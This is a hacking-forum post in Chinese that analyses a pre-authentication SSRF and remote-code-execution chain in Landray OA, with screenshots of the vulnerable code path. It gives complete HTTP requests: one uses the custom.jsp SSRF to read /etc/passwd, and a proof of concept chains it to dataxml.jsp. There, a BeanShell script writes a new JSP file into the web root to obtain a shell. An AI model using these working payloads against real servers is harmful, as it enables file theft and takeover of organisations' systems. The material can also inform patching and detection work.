Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

蓝凌OA前台SSRF+dataxml.jsp RCE漏洞分析

 Share


Recommended Posts

SSRF漏洞

漏洞路径:/sys/ui/extend/varkind/custom.jsp

btekb6.png
<c:import>标签提供了所有<jsp:include>行为标签所具有的功能,同时也允许包含绝对URL。举例来说,使用<c:import>标签可以包含一个FTP服务器中不同的网页内容。
url:待导入资源的URL,可以是相对路径和绝对路径,并且可以导入其他主机资源

<c:param> 标签用于在 <c:url> 标签中指定参数,而且与 URL 编码相关。
在 <c:param> 标签内,name 属性表明参数的名称,value 属性表明参数的值。
  • 1
  • 2
  • 3
  • 4
  • 5

利用SSRF读文件

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 1.1.1.1
Content-Length: 42
Pragma: no-cache
Cache-Control: no-cache
Origin: http://1.1.1.1
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://1.1.1.1/sys/ui/extend/varkind/custom.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=060EB9D7EC3DA6E910B89F3D67BAB52C
Connection: close


var={"body":{"file":"file:///etc/passwd"}}
bteRz9.png

利用dataxml.jsp任意执行代码

参考链接:https://websecuritys.cn/archives/lanling2.html
https://blog.csdn.net/ouyang111222/article/details/48474189

POC

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Go-http-client/1.1
Content-Length: 526
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip


var={"body":{"file":"/sys/common/dataxml.jsp"}}&s_bean=sysFormulaValidate&script=
import%20java.lang.*;import%20java.io.*;Class%20cls=Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter");String%20path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();File%20f=new%20File(path.split("WEB-INF")[0]%2B"/loginx.jsp");f.createNewFile();FileOutputStream%20fout=new%20FileOutputStream(f);fout.write(new%20sun.misc.BASE64Decoder().decodeBuffer("aGVsbG8="));fout.close();&type=int&modelName=test

 

获取s_bean参数值做分割然后进入循环调用getBean函数(getBean获取实例化的bean的id或者name,定义在xml文件),最后调用getDataList函数传入RequestContext

btejsI.png

s_bean=sysFormulaValidate,搜索sysFormulaValidate

btmCFS.png

在spring.xml可以看见

btmFzj.md.png

找到对应的jar包,对着getDataList按两下shift。定位到IXMLDataBean.class

btmAQs.png

找到接口

btmee0.png
btmKFU.png
btm3l9.png

可以看到先获取了script参数,然后调用parseValueScript函数

btmaFO.png

继续往下跟

btmr6A.png

首先判断了script是否为NULL,不为NULL去结尾去特殊字符和空格。然后判断是否存在$,如果存在则进入while循环去除$

btmsOI.md.png
btmgTf.png

最后拼接,然后调用interpreter.eval()
bsh(BeanShell)动态执行java代码:https://blog.csdn.net/ouyang111222/article/details/48474189

btmoXn.png
btn0EV.png

利用写文件 getshell

import%20java.lang.*;import%20java.io.*;Class%20cls=Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter");String%20path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();File%20f=new%20File(path.split("WEB-INF")[0]%2B"/loginx.jsp");f.createNewFile();FileOutputStream%20fout=new%20FileOutputStream(f);fout.write(new%20sun.misc.BASE64Decoder().decodeBuffer("aGVsbG8="));fout.close();
  • 1

为什么loginxx.jsp访问是200,spring.xml允许匿名访问的如下

btuSPS.png
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...